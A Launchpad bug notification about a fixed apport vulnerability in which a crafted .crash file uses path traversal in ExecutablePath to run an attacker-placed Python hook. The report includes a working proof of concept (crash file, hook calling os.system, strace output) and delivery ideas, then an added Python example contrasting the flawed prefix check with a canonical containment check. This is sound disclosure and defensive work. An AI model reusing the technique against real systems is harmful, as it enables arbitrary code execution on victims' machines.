This bug was fixed in the package apport - 2.20.6-0ubuntu4

---------------
apport (2.20.6-0ubuntu4) artful; urgency=medium

  * apport/REThread.py: A bare except needs to be used so that we can catch
    the dialog being closed.
  * test/test_report.py: Be a little patient and give some time for the core
    file to show up.

 -- Brian Murray <br...@ubuntu.com>  Fri, 21 Jul 2017 10:42:33 -0700

** Changed in: apport (Ubuntu Artful)
       Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1700573

Title:
  Code execution through path traversal in .crash files processing

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Trusty:
  Fix Released
Status in apport source package in Xenial:
  Fix Released
Status in apport source package in Yakkety:
  Fix Released
Status in apport source package in Zesty:
  Fix Released
Status in apport source package in Artful:
  Fix Released

Bug description:
  The function add_hooks_info in apport/report.py is vulnerable to a
  directory traversal when processing the ExecutablePath key of a
  malicious .crash file:

          opt_path = None
          if self.get('ExecutablePath', '').startswith(_opt_dir):
              opt_path = self.get('ExecutablePath', '')
          elif package:
              # check package contents
              try:
                  for f in apport.packaging.get_files(package):
                      if f.startswith(_opt_dir) and os.path.isfile(f):
                          opt_path = f
                          break
              except ValueError:
                  # uninstalled package
                  pass

          if opt_path:
              while len(opt_path) >= len(_opt_dir):
                  hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
                  opt_path = os.path.dirname(opt_path)

  
  This can be used to execute an arbitrary python script from an
  attacker controlled path when a crash file is opened:

  fwilhelm@box:~$ cat poc.crash 
  ProblemType: Bug
  ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
  Package: f

  fwilhelm@box:~$ cat /tmp/poc/share/apport/package-hooks/f.py 
  import os
  os.system("gnome-calculator")

  fwilhelm@bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator
  [pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0
  [pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0

  The sub directory requirement makes this a bit tricky to exploit
  remotely, but depending on the environment a malicious USB drive, a
  shared NFS share or a crash file inside an archive could be used.

  Please credit Felix Wilhelm from the Google Security Team in all
  releases, patches and advisories related to these issues.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1700573/+subscriptions
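
Added example, not part of the bug report and not the patch that apport shipped: the prefix test quoted in the description next to a canonicalising containment check, so the difference in the generated hook directories can be inspected. OPT_DIR = "/opt" is an assumption inferred from the PoC path; the function names are hypothetical.

```python
import os

OPT_DIR = "/opt"  # assumption: value of _opt_dir, inferred from the PoC path
HOOK_SUBDIR = ("share", "apport", "package-hooks")


def hook_dirs_prefix_check(executable_path, opt_dir=OPT_DIR):
    """Mirror of the loop quoted in the report: raw string prefix test only."""
    dirs = []
    if executable_path.startswith(opt_dir):
        opt_path = executable_path
        while len(opt_path) >= len(opt_dir):
            dirs.append(os.path.join(opt_path, *HOOK_SUBDIR))
            opt_path = os.path.dirname(opt_path)
    return dirs


def hook_dirs_canonical(executable_path, opt_dir=OPT_DIR):
    """Hardened sketch: resolve '..' and symlinks, then require containment."""
    root = os.path.realpath(opt_dir)
    real = os.path.realpath(executable_path)
    # commonpath compares whole components, so '/optional/x' is not under '/opt'
    if os.path.commonpath([root, real]) != root:
        return []
    dirs = []
    opt_path = real
    while opt_path != root:
        dirs.append(os.path.join(opt_path, *HOOK_SUBDIR))
        opt_path = os.path.dirname(opt_path)
    dirs.append(os.path.join(root, *HOOK_SUBDIR))
    return dirs


def escapes(dirs, opt_dir=OPT_DIR):
    """Return the candidate hook dirs that resolve outside opt_dir."""
    root = os.path.realpath(opt_dir)
    return [d for d in dirs
            if os.path.commonpath([root, os.path.realpath(d)]) != root]


if __name__ == "__main__":
    poc = "/opt/../tmp/poc/share/apport/package-hooks"  # value from the report
    print("prefix check, dirs outside /opt:", escapes(hook_dirs_prefix_check(poc)))
    print("canonical check:", hook_dirs_canonical(poc))
```

Canonicalising the path closes the traversal but does not by itself make the hook directory trustworthy; ownership and write permissions of the resolved directories still matter.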
